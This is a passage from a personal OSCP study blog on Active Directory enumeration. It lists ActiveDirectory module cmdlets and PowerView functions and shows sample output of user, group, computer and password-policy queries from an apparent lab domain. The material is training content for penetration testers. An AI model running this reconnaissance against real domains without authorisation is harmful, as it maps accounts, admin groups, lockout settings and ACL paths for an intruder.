Cmdlet          New-ADAuthenticationPolicy                         1.0.0.0    ActiveDirectory
Cmdlet          New-ADAuthenticationPolicySilo                     1.0.0.0    ActiveDirectory
Cmdlet          New-ADCentralAccessPolicy                          1.0.0.0    ActiveDirectory
Cmdlet          New-ADCentralAccessRule                            1.0.0.0    ActiveDirectory
Cmdlet          New-ADClaimTransformPolicy                         1.0.0.0    ActiveDirectory
Cmdlet          New-ADClaimType                                    1.0.0.0    ActiveDirectory
Cmdlet          New-ADComputer                                     1.0.0.0    ActiveDirectory
Cmdlet          New-ADDCCloneConfigFile                            1.0.0.0    ActiveDirectory
Cmdlet          New-ADFineGrainedPasswordPolicy                    1.0.0.0    ActiveDirectory
Cmdlet          New-ADGroup                                        1.0.0.0    ActiveDirectory
Cmdlet          New-ADObject                                       1.0.0.0    ActiveDirectory
Cmdlet          New-ADOrganizationalUnit                           1.0.0.0    ActiveDirectory
Cmdlet          New-ADReplicationSite                              1.0.0.0    ActiveDirectory
Cmdlet          New-ADReplicationSiteLink                          1.0.0.0    ActiveDirectory
Cmdlet          New-ADReplicationSiteLinkBridge                    1.0.0.0    ActiveDirectory
Cmdlet          New-ADReplicationSubnet                            1.0.0.0    ActiveDirectory
Cmdlet          New-ADResourceProperty                             1.0.0.0    ActiveDirectory
Cmdlet          New-ADResourcePropertyList                         1.0.0.0    ActiveDirectory
Cmdlet          New-ADServiceAccount                               1.0.0.0    ActiveDirectory
Cmdlet          New-ADUser                                         1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADAuthenticationPolicy                      1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADAuthenticationPolicySilo                  1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADCentralAccessPolicy                       1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADCentralAccessPolicyMember                 1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADCentralAccessRule                         1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADClaimTransformPolicy                      1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADClaimType                                 1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADComputer                                  1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADComputerServiceAccount                    1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADDomainControllerPasswordReplicationPolicy 1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADFineGrainedPasswordPolicy                 1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADFineGrainedPasswordPolicySubject          1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADGroup                                     1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADGroupMember                               1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADObject                                    1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADOrganizationalUnit                        1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADPrincipalGroupMembership                  1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADReplicationSite                           1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADReplicationSiteLink                       1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADReplicationSiteLinkBridge                 1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADReplicationSubnet                         1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADResourceProperty                          1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADResourcePropertyList                      1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADResourcePropertyListMember                1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADServiceAccount                            1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADUser                                      1.0.0.0    ActiveDirectory
Cmdlet          Rename-ADObject                                    1.0.0.0    ActiveDirectory
Cmdlet          Reset-ADServiceAccountPassword                     1.0.0.0    ActiveDirectory
Cmdlet          Restore-ADObject                                   1.0.0.0    ActiveDirectory
Cmdlet          Revoke-ADAuthenticationPolicySiloAccess            1.0.0.0    ActiveDirectory
Cmdlet          Search-ADAccount                                   1.0.0.0    ActiveDirectory
Cmdlet          Set-ADAccountAuthenticationPolicySilo              1.0.0.0    ActiveDirectory
Cmdlet          Set-ADAccountControl                               1.0.0.0    ActiveDirectory
Cmdlet          Set-ADAccountExpiration                            1.0.0.0    ActiveDirectory
Cmdlet          Set-ADAccountPassword                              1.0.0.0    ActiveDirectory
Cmdlet          Set-ADAuthenticationPolicy                         1.0.0.0    ActiveDirectory
Cmdlet          Set-ADAuthenticationPolicySilo                     1.0.0.0    ActiveDirectory
Cmdlet          Set-ADCentralAccessPolicy                          1.0.0.0    ActiveDirectory
Cmdlet          Set-ADCentralAccessRule                            1.0.0.0    ActiveDirectory
Cmdlet          Set-ADClaimTransformLink                           1.0.0.0    ActiveDirectory
Cmdlet          Set-ADClaimTransformPolicy                         1.0.0.0    ActiveDirectory
Cmdlet          Set-ADClaimType                                    1.0.0.0    ActiveDirectory
Cmdlet          Set-ADComputer                                     1.0.0.0    ActiveDirectory
Cmdlet          Set-ADDefaultDomainPasswordPolicy                  1.0.0.0    ActiveDirectory
Cmdlet          Set-ADDomain                                       1.0.0.0    ActiveDirectory
Cmdlet          Set-ADDomainMode                                   1.0.0.0    ActiveDirectory
Cmdlet          Set-ADFineGrainedPasswordPolicy                    1.0.0.0    ActiveDirectory
Cmdlet          Set-ADForest                                       1.0.0.0    ActiveDirectory
Cmdlet          Set-ADForestMode                                   1.0.0.0    ActiveDirectory
Cmdlet          Set-ADGroup                                        1.0.0.0    ActiveDirectory
Cmdlet          Set-ADObject                                       1.0.0.0    ActiveDirectory
Cmdlet          Set-ADOrganizationalUnit                           1.0.0.0    ActiveDirectory
Cmdlet          Set-ADReplicationConnection                        1.0.0.0    ActiveDirectory
Cmdlet          Set-ADReplicationSite                              1.0.0.0    ActiveDirectory
Cmdlet          Set-ADReplicationSiteLink                          1.0.0.0    ActiveDirectory
Cmdlet          Set-ADReplicationSiteLinkBridge                    1.0.0.0    ActiveDirectory
Cmdlet          Set-ADReplicationSubnet                            1.0.0.0    ActiveDirectory
Cmdlet          Set-ADResourceProperty                             1.0.0.0    ActiveDirectory
Cmdlet          Set-ADResourcePropertyList                         1.0.0.0    ActiveDirectory
Cmdlet          Set-ADServiceAccount                               1.0.0.0    ActiveDirectory
Cmdlet          Set-ADUser                                         1.0.0.0    ActiveDirectory
Cmdlet          Show-ADAuthenticationPolicyExpression              1.0.0.0    ActiveDirectory
Cmdlet          Sync-ADObject                                      1.0.0.0    ActiveDirectory
Cmdlet          Test-ADServiceAccount                              1.0.0.0    ActiveDirectory
Cmdlet          Uninstall-ADServiceAccount                         1.0.0.0    ActiveDirectory
Cmdlet          Unlock-ADAccount                                   1.0.0.0    ActiveDirectory

Execution examples:
    - Get domain users:

PS C:\Users\worker2\Documents> Get-ADUser

cmdlet Get-ADUser en la posición 1 de la canalización de comandos
Proporcione valores para los parámetros siguientes:
(Escriba !? para obtener Ayuda).
Filter: *


DistinguishedName : CN=Administrador,CN=Users,DC=CORPORATIVE,DC=DOMAIN,DC=local
Enabled           : True
GivenName         :
Name              : Administrador
ObjectClass       : user
ObjectGUID        : fac68faf-e080-4edc-8c0d-e9074b6b245e
SamAccountName    : Administrador
SID               : S-1-5-21-2048228633-4105951457-1013245227-500
Surname           :
UserPrincipalName :

DistinguishedName : CN=Invitado,CN=Users,DC=CORPORATIVE,DC=DOMAIN,DC=local
Enabled           : False
GivenName         :
Name              : Invitado
ObjectClass       : user
ObjectGUID        : e97cfc2c-0d03-47e6-8da7-9196cb028e2f
SamAccountName    : Invitado
SID               : S-1-5-21-2048228633-4105951457-1013245227-501
Surname           :
UserPrincipalName :

DistinguishedName : CN=DefaultAccount,CN=Users,DC=CORPORATIVE,DC=DOMAIN,DC=local
Enabled           : False
GivenName         :
Name              : DefaultAccount
ObjectClass       : user
ObjectGUID        : 34b807f2-66a4-47cd-b140-20f32341c678
SamAccountName    : DefaultAccount
SID               : S-1-5-21-2048228633-4105951457-1013245227-503
Surname           :
UserPrincipalName :

DistinguishedName : CN=krbtgt,CN=Users,DC=CORPORATIVE,DC=DOMAIN,DC=local
Enabled           : False
GivenName         :
Name              : krbtgt
ObjectClass       : user
ObjectGUID        : 32daa5cd-711e-4054-9dba-e718739a7c0f
SamAccountName    : krbtgt
SID               : S-1-5-21-2048228633-4105951457-1013245227-502
Surname           :
UserPrincipalName :

DistinguishedName : CN=trabajador1,CN=Users,DC=CORPORATIVE,DC=DOMAIN,DC=local
Enabled           : True
GivenName         : trabajador1
Name              : trabajador1
ObjectClass       : user
ObjectGUID        : 1c1959f2-3042-48a0-8127-2266b90fc647
SamAccountName    : worker1
SID               : S-1-5-21-2048228633-4105951457-1013245227-1106
Surname           :
UserPrincipalName : worker1@CORPORATIVE.DOMAIN.local

DistinguishedName : CN=trabajador2,CN=Users,DC=CORPORATIVE,DC=DOMAIN,DC=local
Enabled           : True
GivenName         : trabajador2
Name              : trabajador2
ObjectClass       : user
ObjectGUID        : 29a63c66-b44a-48cf-93bc-b1acdd9ca77a
SamAccountName    : worker2
SID               : S-1-5-21-2048228633-4105951457-1013245227-1107
Surname           :
UserPrincipalName : worker2@CORPORATIVE.DOMAIN.local


    - Obtaining domain groups:


PS C:\Users\worker2\Documents> Get-ADGroup


cmdlet Get-ADGroup en la posición 1 de la canalización de comandos

Proporcione valores para los parámetros siguientes:

(Escriba !? para obtener Ayuda).

Filter: *



DistinguishedName : CN=Administradores,CN=Builtin,DC=CORPORATIVE,DC=DOMAIN,DC=local

GroupCategory     : Security

GroupScope        : DomainLocal

Name              : Administradores

ObjectClass       : group

ObjectGUID        : b8cbfc78-0068-4e59-8de0-bd29995f88f2

SamAccountName    : Administradores

SID               : S-1-5-32-544


DistinguishedName : CN=Usuarios,CN=Builtin,DC=CORPORATIVE,DC=DOMAIN,DC=local

GroupCategory     : Security

GroupScope        : DomainLocal

Name              : Usuarios

ObjectClass       : group

ObjectGUID        : b4da0565-18ab-405c-8236-052cc188f9cd

SamAccountName    : Usuarios

SID               : S-1-5-32-545


DistinguishedName : CN=Invitados,CN=Builtin,DC=CORPORATIVE,DC=DOMAIN,DC=local

GroupCategory     : Security

GroupScope        : DomainLocal

Name              : Invitados

ObjectClass       : group

ObjectGUID        : 4ff00d11-fd45-418e-833f-ce1775122be3

SamAccountName    : Invitados

SID               : S-1-5-32-546


DistinguishedName : CN=Opers. de impresión,CN=Builtin,DC=CORPORATIVE,DC=DOMAIN,DC=local

GroupCategory     : Security

GroupScope        : DomainLocal

Name              : Opers. de impresión

ObjectClass       : group

ObjectGUID        : f0082985-9e5b-4968-9517-7007bc0048eb

SamAccountName    : Opers. de impresión

SID               : S-1-5-32-550


.....

        etc 

 

    - Obtaining Domain Computers:


PS C:\Users\worker2\Documents> Get-ADComputer


cmdlet Get-ADComputer en la posición 1 de la canalización de comandos

Proporcione valores para los parámetros siguientes:

(Escriba !? para obtener Ayuda).

Filter: *

DistinguishedName : CN=CORPORATIVE-DOM,OU=Domain Controllers,DC=CORPORATIVE,DC=DOMAIN,DC=local

DNSHostName       : CORPORATIVE-DOMAIN.CORPORATIVE.DOMAIN.local

Enabled           : True

Name              : CORPORATIVE-DOM

ObjectClass       : computer

ObjectGUID        : cda5f480-f490-4cbf-bf0f-354e232a603d

SamAccountName    : CORPORATIVE-DOM$

SID               : S-1-5-21-2048228633-4105951457-1013245227-1000

UserPrincipalName :


DistinguishedName : CN=WKS-002,CN=Computers,DC=CORPORATIVE,DC=DOMAIN,DC=local

DNSHostName       : WKS-002.CORPORATIVE.DOMAIN.local

Enabled           : True

Name              : WKS-002

ObjectClass       : computer

ObjectGUID        : fb8e2755-be32-43bd-90e1-3c259e1df104

SamAccountName    : WKS-002$

SID               : S-1-5-21-2048228633-4105951457-1013245227-1103

UserPrincipalName :


DistinguishedName : CN=WKS-001,CN=Computers,DC=CORPORATIVE,DC=DOMAIN,DC=local

DNSHostName       : WKS-001.CORPORATIVE.DOMAIN.local

Enabled           : True

Name              : WKS-001

ObjectClass       : computer

ObjectGUID        : e5c3910e-a9f2-403d-922a-35d41451308f

SamAccountName    : WKS-001$

SID               : S-1-5-21-2048228633-4105951457-1013245227-1104

UserPrincipalName :

    
    - Obtaining Default domain Access policy:

PS C:\Users\worker2\Documents> Get-ADDefaultDomainPasswordPolicy


ComplexityEnabled           : True
DistinguishedName           : DC=CORPORATIVE,DC=DOMAIN,DC=local
LockoutDuration             : 00:30:00
LockoutObservationWindow    : 00:30:00
LockoutThreshold            : 0
MaxPasswordAge              : 42.00:00:00
MinPasswordAge              : 1.00:00:00
MinPasswordLength           : 7
objectClass                 : {domainDNS}
objectGuid                  : 2628752b-488d-4d56-83c1-6a3088415297
PasswordHistoryCount        : 24
ReversibleEncryptionEnabled : False



2.3 Powershell: Powerview Module

Interesting functions for enumeration:

Domain/LDAP Functions:

Get-DomainDNSZone               -   enumerates the Active Directory DNS zones for a given domain
Get-DomainDNSRecord             -   enumerates the Active Directory DNS records for a given zone
Get-Domain                      -   returns the domain object for the current (or specified) domain
Get-DomainController            -   return the domain controllers for the current (or specified) domain
Get-Forest                      -   returns the forest object for the current (or specified) forest
Get-ForestDomain                -   return all domains for the current (or specified) forest
Get-ForestGlobalCatalog         -   return all global catalogs for the current (or specified) forest
Find-DomainObjectPropertyOutlier-   inds user/group/computer objects in AD that have 'outlier' properties set
Get-DomainUser                  -   return all users or specific user objects in AD
New-DomainUser                  -   creates a new domain user (assuming appropriate permissions) and returns the user object
Get-DomainUserEvent             -   enumerates account logon events (ID 4624) and Logon with explicit credential events
Get-DomainComputer              -   returns all computers or specific computer objects in AD
Get-DomainObject                -   returns all (or specified) domain objects in AD
Set-DomainObject                -   modifies a gven property for a specified active directory object
Get-DomainObjectAcl             -   returns the ACLs associated with a specific active directory object
Add-DomainObjectAcl             -   adds an ACL for a specific active directory object
Find-InterestingDomainAcl       -   finds object ACLs in the current (or specified) domain with modification rights set to non-built in objects
Get-DomainOU                    -   search for all organization units (OUs) or specific OU objects in AD
Get-DomainSite                  -   search for all sites or specific site objects in AD
Get-DomainSubnet                -   search for all subnets or specific subnets objects in AD
Get-DomainSID                   -   returns the SID for the current domain or the specified domain
Get-DomainGroup                 -   return all groups or specific group objects in AD
New-DomainGroup                 -   creates a new domain group (assuming appropriate permissions) and returns the group object
Get-DomainManagedSecurityGroup  -   returns all security groups in the current (or target) domain that have a manager set
Get-DomainGroupMember           -   return the members of a specific domain group
Add-DomainGroupMember           -   adds a domain user (or group) to an existing domain group, assuming appropriate permissions to do so
Get-DomainFileServer            -   returns a list of servers likely functioning as file servers
Get-DomainDFSShare              -   returns a list of all fault-tolerant distributed file systems for the current (or specified) domain

GPO functions

Get-DomainGPO                           -   returns all GPOs or specific GPO objects in AD
Get-DomainGPOLocalGroup                 -   returns all GPOs in a domain that modify local group memberships through 'Restricted Groups' or Group Policy preferences
Get-DomainGPOUserLocalGroupMapping      -   enumerates the machines where a specific domain user/group is a member of a specific local group, all through GPO correlation
Get-DomainGPOComputerLocalGroupMapping  -   takes a computer (or GPO) object and determines what users/groups are in the specified local group for the machine through GPO correlation
Get-DomainPolicy                        -   returns the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller

Computer Enumeration Functions

Get-NetLocalGroup                   -   enumerates the local groups on the local (or remote) machine
Get-NetLocalGroupMember             -   enumerates members of a specific local group on the local (or remote) machine
Get-NetShare                        -   returns open shares on the local (or a remote) machine
Get-NetLoggedon                     -   returns users logged on the local (or a remote) machine
Get-NetSession                      -   returns session information for the local (or a remote) machine
Get-RegLoggedOn                     -   returns who is logged onto the local (or a remote) machine through enumeration of remote registry keys
Get-NetRDPSession                   -   returns remote desktop/session information for the local (or a remote) machine
Test-AdminAccess                    -   rests if the current user has administrative access to the local (or a remote) machine
Get-NetComputerSiteName             -   returns the AD site where the local (or a remote) machine resides
Get-WMIRegProxy                     -   enumerates the proxy server and WPAD conents for the current user
Get-WMIRegLastLoggedOn              -   returns the last user who logged onto the local (or a remote) machine
Get-WMIRegCachedRDPConnection       -   returns information about RDP connections outgoing from the local (or remote) machine
Get-WMIRegMountedDrive              -   returns information about saved network mounted drives for the local (or remote) machine
Get-WMIProcess                      -   returns a list of processes and their owners on the local or remote machine
Find-InterestingFile                -   searches for files on the given path that match a series of specified criteria



Execution examples:

PS C:\Users\worker2\Documents\PowerSploit-3.0.0\Recon> Get-DomainSID
S-1-5-21-2048228633-4105951457-1013245227
PS C:\Users\worker2\Documents\PowerSploit-3.0.0\Recon> Get-DomainPolicy


RegistryValues : @{MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash=System.String[]}
SystemAccess   : @{MinimumPasswordAge=1; MaximumPasswordAge=42; LockoutBadCount=0; PasswordComplexity=1;
                 RequireLogonToChangePassword=0; LSAAnonymousNameLookup=0; ForceLogoffWhenHourExpire=0;
                 PasswordHistorySize=24; ClearTextPassword=0; MinimumPasswordLength=7}
Version        : @{Revision=1; signature="$CHICAGO$"}
KerberosPolicy : @{MaxTicketAge=10; MaxServiceAge=600; MaxClockSkew=5; MaxRenewAge=7;
                 TicketValidateClient=1}
Unicode        : @{Unicode=yes}


PS C:\Users\worker2\Documents\PowerSploit-3.0.0\Recon> Get-UserProperty


Name
----
accountexpires
admincount
adspath
badpasswordtime
badpwdcount
cn
codepage
countrycode
description
distinguishedname
dscorepropagationdata
instancetype
iscriticalsystemobject
lastlogoff
lastlogon
lastlogontimestamp
logoncount
memberof
name
objectcategory
objectclass
objectguid
objectsid
primarygroupid
pwdlastset
samaccountname
samaccounttype
useraccountcontrol
usnchanged
usncreated
whenchanged
whencreated

 And this is all, for this Active directory recognition, I hope that you enjoy with my seventh windows entry and you'll follow my blog [https://roadtooscp-f0ns1.blogspot.com/]. We'll keep in touch.

with kind regards, f0ns1
at No comments:
Subscribe to: Posts (Atom)

Mi primera experiencia en una conferencia:

En la jornada posterior a un evento importante toca analizar, en este caso me centro en mi participación como speaker en #librecon2022. ¿Cóm...